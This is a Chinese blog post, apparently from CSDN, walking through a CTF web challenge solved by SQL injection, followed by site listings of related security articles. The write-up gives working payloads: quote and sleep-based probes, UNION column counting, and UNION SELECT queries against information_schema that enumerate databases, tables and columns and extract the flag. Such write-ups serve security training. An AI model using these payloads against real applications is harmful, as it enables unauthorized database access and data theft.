从一道CTF题目看sql注入中元数据的应用

最新推荐文章于 2024-08-26 23:27:49 发布
最新推荐文章于 2024-08-26 23:27:49 发布
阅读量686 收藏
点赞数
分类专栏: 杂乱的东西 文章标签: sql注入 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jlu16/article/details/80781742
版权

前言

第一次看到元数据在sql注入的应用好像是在《web安全深度剖析》,鉴于经验缺乏,只是知道有这么个东西,不知道怎么应用。今天遇到一道和元数据相关的SQL注入题目,所以记录下来。

获取元数据

//获取所有的库名称:
select SCHEMA_NAME from information_schema.SCHEMATA
//获取某一库中所有表的名称:
select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA='此处为库名'
//获取某一表的所有字段名
select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='此处为表名'

题目分析

题目地址:http://120.24.86.145:8002/chengjidan/

第一步测试

出于习惯,在输入框提交以下信息:

’(单引号) —无反应

1-3 三个数字 —显示三个人的成绩

1' and sleep(3) -- s —延时返回,结果与只输入1相同(这里引号应该闭合成功了,and sleep(3) 可替换为其他合法语句)

' or 1=1 -- s—与只输入1相同(这里猜测其实查询出了多条记录,但是页面只显示第一条)

' or 1=1 order by id DESC -- s —与只输入3相同(到这里可以大概判断出:该表中共有3条记录,且页面只显示每次查询的第一条记录,与上面的猜测吻合)

进一步猜测查询语句结构

为了方便后续使用union查询,我们需要进一步判断当前查询语句查询了几个字段。 

1' union select 1,2,3 -- s
1' union select 1,2,3,4 -- s
1' union select 1,2,3,4,5 -- s

执行上述语句后只有第二个正常返回结果,所以查询语句应该查询了4个字段。

寻找flag在数据库中的位置


这里就是用到元数据的地方了。其实根据上面的测试,我们已经找到了能够执行语句的地方。 

-1' (此处填写合法语句) -- s //这里-1是因为想让他查不出任何记录,这样第一条记录才会是我想要的记录。

首先查询数据库:SELECT SCHEMA_NAME FROM information_schema.SCHEMATA
构造如下语句:-1' union select 1,2,3,(SELECT group_concat(SCHEMA_NAME) FROM information_schema.SCHEMATA) -- s (group_concat为了使得多个记录显示在一起)。
可查询出flag所在数据库:skctf_flag

再查询skctf_flag中有哪些表:
-1' union SELECT 1,2,3,(SELECT group_concat(TABLE_NAME) FROM information_schema.TABLES WHERE TABLE_SCHEMA='skctf_flag') -- s
可知flag应该在fl4g表中。

再查询表中列:-1' union select 1,2,3,(select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME='fl4g') -- s
列为skctf_flag。

最后查询flag:-1' union select 1,2,3,(select skctf_flag from fl4g) -- s

结束。

jlu16
关注
专栏目录
sql注入
zejiiii的博客
02-15 3086
SQL注入 一 注入分类 注入点分类 数字型注入 字符型注入 提交方式分类 提交方式分类 GET 方式注入 POST 方式注入 COOKIE 方式注入 HTTP 头部注入:XFF,UA,REFRERE 是否回显 联合查询 布尔盲注 报错注入 时间盲注 二次注入 堆叠查询(同时执行多条语句) 二 注入判断 工具扫描:网站漏扫工具,AWVS、AppScan、OWASP-ZAP、Nes
【愚公系列】2024年03月 《CTF实战:从入门到提升》 003-Web安全基础知识(HTTP安全
时光隧道
02-26 6万+
HTTP安全是指在使用HTTP协议进行通信时,采取的一系列措施和技术,以确保传输过程的数据的机密性、完整性和可信性。HTTP协议本身是一种明文的协议,数据在传输过程容易被窃听、篡改或伪造。措施描述HTTPS在HTTP协议基础上增加了SSL/TLS加密层,通过对通信内容进行加密以保护数据的机密性。加密使用对称加密或非对称加密算法对敏感数据如用户登录信息或支付信息进行加密,防止数据被窃听。认证通过身份验证技术验证通信双方的身份,确保通信的可信性。
SQL注入数据库元数据
xiaoka__的博客
07-19 223
数据库里面有元数据,在SQL注入的时候需要用到。 数据库里有一个数据库名叫information_schema。 information_schema数据库下,有几个比较重要的表。 1.schemata 存放当前所有数据库信息。 常用字段: schema_name(数据库名) 2.tables 存放(所有数据库的)所有表信息。 tables表的字段: table_name(表名) table_schema(表所属数据库) 3.columns 存放(所有数据库的所有表的)所有字段。 columns表的字
mysql 查看元数据常用语句
赶路人儿
11-19 1169
1、列出数据表及表状态信息 SHOW TABLE STATUS [FROM db_name]
[极客大挑战 2019]BabySQL 获取元数据CTF实例
EC_Carrot的博客
10-19 349
[极客大挑战 2019]BabySQL 前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! 一、收集信息 首先打开网页 它说做了过滤,别管它!登录界面直接试万能密码’or 1='1 发现or给过滤为空了,这里就直接能想到用双写来绕过,但是不用急,先做做Fuzz测试 主要过滤了select、union、or、from、where这些函数 再配合双写来进行联合查询看看 check.php?username
张小白的渗透之路(三)——SQL注入漏洞原理详解(SQL Server)
Litbai_zhang
09-24 1550
常见数据库注入 对于大多数的数据库而言,SQL注入的原理基本相似,因为每个数据库都遵循一个SQL语法标准。但是他们之间也存在包括像语法、函数等许多细微的差异。所以,在针对不同的数据库注入时,思路、方法也不可能完全一样。因个人的经验所限,在接下来的实例,只讨论Oracle 11g、MySQL 5.1、SQL Server2008三种数据库的注入。 值得一提的注入 攻击者对数据库的注入,无非是利用数...
CTF杂项总结
夏日 の blog
02-01 2万+
目录 一、流量分析篇 二、文件头篇 三、压缩包篇 四、图片隐写篇 五、音频隐写篇 六、视频隐写 七、取证 八、Other 参考文章: 一、流量分析篇 通常比赛会提供一个包含流量数据的 PCAP 文件,有时候也会需要选手们先进行修复或重构传输文件后,再进行分析。 PCAP 这一块作为重点考察方向,复杂的地方在于数据包里充满着大量无关的流量信息,因此如何分类和过滤数据是参赛者...
【愚公系列】2024年03月 《CTF实战:从入门到提升》 004-Web安全基础知识(基础工具使用)
时光隧道
02-26 6万+
CTF(Capture The Flag)是一种网络安全竞赛,参赛者通过解决一系列与网络安全相关的问题,获取旗帜并积分。CTFWeb安全基础工具则是在CTF用于进行Web安全攻防的工具。作用和意义描述简化攻防过程CTFWeb安全基础工具提供了各种自动化和半自动化的工具,可以帮助参赛者快速进行渗透测试、漏洞挖掘和攻击。这些工具可以简化繁琐的攻击过程,提高效率。快速发现漏洞CTFWeb安全基础工具集成了各种漏洞扫描和渗透测试工具,可以帮助参赛者快速发现Web应用程序的漏洞。
CTF的网络流量分析:工具、技术与实战案例
最新发布
weixin_65409651的博客
08-26 1450
网络流量分析是一项通过捕获和检查网络数据包来解析网络活动的技术。分析者可以识别网络的恶意活动、异常行为或数据泄露等问题。网络流量分析在CTF竞赛常用于重建网络攻击过程、提取敏感数据、识别命令与控制(C2)通信等任务。
网络安全实验室CTF练习部分题目(持续更新)
技术学习人生
06-29 8万+
1、脚本关:微笑一下,过关地址:http://lab1.xseclab.com/base13_ead1b12e47ec7cc5390303831b779d47/index.php 查看源代码: include('flag.php'); $smile = 1; if (!isset ($_GET['^_^'])) $smile = 0; if (preg_match
大数据企业级项目实战--Titan大型数据运营系统项目课程
06-01
课程简介:  本项目课程是一门极具综合性和完整性的大型项目课程;课程项目的业务背景源自各类互联网公司对海量用户浏览行为数据和业务数据分析的需求及企业数据管理、数据运营需求。 本课程项目涵盖数据采集与预处理、数据仓库体系建设、用户画像系统建设、数据治理(元数据管理、数据质量管理)、任务调度系统、数据服务层建设、OLAP即席分析系统建设等大量模块,力求原汁原味重现一个完备的企业级大型数据运营系统。  拒绝demo,拒绝宏观抽象,拒绝只讲不练,本课程高度揉和理论与实战,并兼顾各层次的学员,真正从0开始,循序渐进,每一个步骤每一个环节,都会带领学员从需求分析开始,到逻辑设计,最后落实到每一行代码,所有流程都采用企业级解决方案,并手把手带领学员一一实现,拒绝复制粘贴,拒绝demo化的实现。并且会穿插大量的原创图解,来帮助学员理解复杂逻辑,掌握关键流程,熟悉核心架构。   跟随项目课程,历经接近100+小时的时间,从需求分析开始,到数据埋点采集,到预处理程序代码编写,到数仓体系搭建......逐渐展开整个项目的宏大视图,构建起整个项目的摩天大厦。  由于本课程不光讲解项目的实现,还会在实现过程反复揉和各种技术细节,各种设计思想,各种最佳实践思维,学完本项目并勤于实践的话,学员的收获将远远超越一个项目的具体实现,更能对大型数据系统开发产生深刻体悟,对很多技术的应用将感觉豁然开朗,并带来融会贯通能力的巨大飞跃。当然,最直接的收获是,学完本课程,你将很容易就拿到大数据数仓建设或用户画像建设等岗位的OFFER课程模块: 1. 数据采集:涉及到埋点日志flume采集系统,sqoop业务数据抽取系统等; 2. 数据预处理:涉及到各类字典数据构建,复杂结构数据清洗解析,数据集成,数据修正,以及多渠道数据的用户身份标识打通:ID-MAPPING等;3. 数据仓库:涉及到hive数仓基础设施搭建,数仓分层体系设计,数仓分析主题设计,多维分析实现,ETL任务脚本开发,ETL任务调度,数据生命周期管理等;4. 数据治理:涉及数据资产查询管理,数据质量监控管理,atlas元数据管理系统,atlas数据血缘管理等;5. 用户画像系统:涉及画像标签体系设计,标签体系层级关系设计,各类标签计算实现,兴趣类标签的衰减合并,模型标签的机器学习算法应用及特征提取、模型训练等;6. OLAP即席分析平台:涉及OLAP平台的整体架构设计,技术选型,底层存储实现,Presto查询引擎搭建,数据服务接口开发等;7. 数据服务:涉及数据服务的整体设计理念,架构搭建,各类数据访问需求的restapi开发等;课程所涉及的技术: 整个项目课程,将涉及到一个大型数据系统所用到的几乎所有主要技术,具体来说,包含但不限于如下技术组件:l Hadoopl Hivel HBasel SparkCore /SparkSQL/ Spark GRAPHX / Spark Mllibl Sqoopl Azkabanl Flumel lasal Kafkal Zookeeperl Solrl Prestop
CTF基础知识
m0_65849838的博客
04-26 6430
文章目录一. CTF简介1.开启题目并点击题目附件2.得到正文和flag①正文②FLAG二.竞赛模式1.开启题目并点击题目附件2.正文和flag①正文理论知识Jeopardy-解题AwD-攻防模式AWP-攻防增强RHG-自动化[ AI自动化]RW-真实世界KoH-抢占山头Mix[混合]②flag三.比赛形式1.开启题目并点击题目附件2.正文和flag①正文线上线下②flag四.题目1.开启题目并点击题目附件二.正文和flag①正文WebPwnReverseCryptoMisc②flag 一. CTF简介 1
CTF之misc-图片隐写
热门推荐
Battery的博客
05-03 15万+
一·隐写术的介绍 隐写术是一门关于信息隐藏的技巧与科学,所谓信息隐藏指的是不让除预期 的接收者之外的任何人知晓信息的传递事件或者信息的内容。隐写术的英文 叫做Steganography,来源于特里特米乌斯的一本讲述密码学与隐写术的著 作Steganographia,该书书名源于希腊语,意为“隐秘书写”。 二.图片隐写 1.常用工具 HexWorkshop Stegsolve Binwalk dd命令 2.查看十六进制,用HexWorkshop将图片打开,搜索flag等关键字或翻到最后,可能会
网络安全CTF夺旗赛入门到入狱-入门介绍篇
2201_75735270的博客
09-25 989
flag是指一串具有一定格式的字符串或其他内容,flag可能来自于一台远端的服务 器,一个复杂的软件,也可能隐藏在一段通过密码算法或协议加密的数据,或是一 组网络流量及音频视频文件。选手需要综合利用自己掌握的安全技术,并辅以快 速学习新知识,通过获取服务器权限,分析并破解软件或是设计解密算法等不限定 途径来获取flagCTF攻防模式。
ctf-爆破-BurnUnlimited的使用之旅
mafucan的博客
07-12 963
爆破是在ctf解题过程经常要使用到的,但是现在还是一脸懵逼,这里会记录自己平时对于爆破的使用和一些小感受。 第一个成功用爆破解出来的题
CTF训练笔记(五)- 一些获取FLAG的方法总结(待续)
morrino的博客
04-21 2万+
- 注意开放了未知服务的端口,可以使用nc工具获取对应的Banner信息; - 当命令疑似被过滤时,尝试使用相近的shell命令绕开过滤,如‘cat’换成‘more’; - 不放过任何可利用服务和细节,哪怕可能会做无用功; [CTF训练笔记系列 - 快速导航](https://blog.csdn.net/morrino/article/details/116036237)
sql 注入不能做到_[转发]元数据注入实战
weixin_39564036的博客
11-22 295
1.ETL元数据应用场景在团队参与大数据项目开发过程,需要从各业务系统抽取数据录入数据台进行管理,经过技术调研后决定采用CKettle。在制作转换时,如下图所示,使用表输入组件,其SQL与记录数据限制可以通过选取一个变量来设置值;但是对于其它一些属性,如步骤名称、数据库连接等就只能配置死,这时候我们可以利用CKettle元数据注入插件把其余或者全部参数设置进去,如下图:对于...
CTF之misc-日志分析
Battery的博客
05-04 14万+
1、注入审计 出题人通常会使用sqlmap去跑一个注入点,跑出数据后将日志留存,让参 赛者判断sqlmap注出了什么数据,此数据通常就为flag。 2、命令执行审计 出题人通常会利用一句话木马,进行一系列敏感操作,或者假装一开始不知 道一句话木马的密码,从而进行一系列的爆破行为,让参赛者判断一句话木 马的密码。 ......
CTF-SQL注入
weixin_44770698的博客
06-16 5329
CTF-SQL注入题目整理
ctfsql注入题目解法
05-05
CTFSQL注入是一种常见的攻击类型,通常是通过构造恶意输入来绕过应用程序的安全控制,从而访问或篡改应用程序的数据。 以下是一些SQL注入题目的解法: 1. 基于错误的注入:这种类型的注入通常涉及到将错误的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值